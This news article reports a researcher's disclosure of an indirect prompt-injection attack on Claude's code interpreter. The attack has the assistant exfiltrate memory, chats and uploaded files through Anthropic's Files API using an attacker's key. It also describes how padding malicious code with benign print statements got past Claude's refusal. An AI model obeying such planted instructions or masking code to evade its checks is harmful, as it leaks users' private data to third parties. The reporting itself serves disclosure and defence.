A newly disclosed vulnerability in Anthropic’s Claude AI assistant has revealed how attackers can weaponize the platform’s code interpreter feature to silently exfiltrate enterprise data, bypassing even the default security settings designed to prevent such attacks.
Security researcher Johann Rehberger demonstrated that Claude’s code interpreter can be manipulated through indirect prompt injection to steal sensitive information, including chat histories, uploaded documents, and data accessed through integrated services. The attack leveraged Claude’s own API infrastructure to send stolen data directly to attacker-controlled accounts.
The exploit took advantage of a critical oversight in Claude’s network access controls. While the platform’s default “Package managers only” setting restricted outbound connections to approved domains like npm and PyPI, it also allowed access to api.anthropic.com, the very endpoint attackers can abuse for data theft.
How the attack works
The attack chain orchestrated by the researcher relied on indirect prompt injection, where malicious instructions are hidden within documents, websites, or other content that users ask Claude to analyze. Once triggered, the exploit executes a multi-stage process:
First, Claude retrieves sensitive data — such as recent conversation history using the platform’s newly introduced memory feature — and writes it to a file in the code interpreter sandbox. The malicious payload then instructs Claude to execute Python code that uploads the file to Anthropic’s Files API, but with a crucial twist: the upload uses the attacker’s API key rather than the victim’s.
“This code issues a request to upload the file from the sandbox. However, this is done with a twist,” Rehberger wrote in his blog post. “The upload will not happen to the user’s Anthropic account, but to the attackers, because it’s using the attacker’s ANTHROPIC_API_KEY.”
The technique allows exfiltration of up to 30MB per file, according to Anthropic’s API documentation, with no limit on the number of files that can be uploaded.
Bypassing AI safety controls
Rehberger’s report stated that developing a reliable exploit proved challenging due to Claude’s built-in safety mechanisms. The AI initially refused requests containing plaintext API keys, recognizing them as suspicious. However, Rehberger added that mixing malicious code with benign instructions — such as simple print statements — was sufficient to bypass these safeguards.
“I tried tricks like XOR and base64 encoding. None worked reliably,” Rehberger explained. “However, I found a way around it… I just mixed in a lot of benign code, like print (‘Hello, world’), and that convinced Claude that not too many malicious things are happening.”
Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.
Rehberger disputed this categorization. “I do not believe this is just a safety issue, but a security vulnerability with the default network egress configuration that can lead to exfiltration of your private information,” he wrote. “Safety protects you from accidents. Security protects you from adversaries.”
Anthropic did not immediately respond to a request for comment.
Attack vectors and real-world risk
The vulnerability can be exploited through multiple entry points, the blog post added. “Malicious actors could embed prompt injection payloads in documents shared for analysis, websites users ask Claude to summarize, or data accessed through Model Context Protocol (MCP) servers and Google Drive integrations,” the blog added.
Organizations using Claude for sensitive tasks — such as analyzing confidential documents, processing customer data, or accessing internal knowledge bases — face particular risk. The attack leaves minimal traces, as the exfiltration occurs through legitimate API calls that blend with normal Claude operations.
For enterprises, mitigation options remain limited. Users can disable network access entirely or manually configure allow-lists for specific domains, though this significantly reduces Claude’s functionality. Anthropic recommends monitoring Claude’s actions and manually stopping execution if suspicious behavior is detected — an approach Rehberger characterizes as “living dangerously.”
The company’s security documentation also acknowledges the risk: “This means Claude can be tricked into sending information from its context (for example, prompts, projects, data via MCP, Google integrations) to malicious third parties,” Rehberger noted.
However, enterprises may incorrectly assume the default “Package managers only” configuration provides adequate protection. Rehberger’s research demonstrated that the assumption is false. Rehberger has not published the complete exploit code to protect users while the vulnerability remains unpatched. He noted that other domains on Anthropic’s approved list may present similar exploitation opportunities.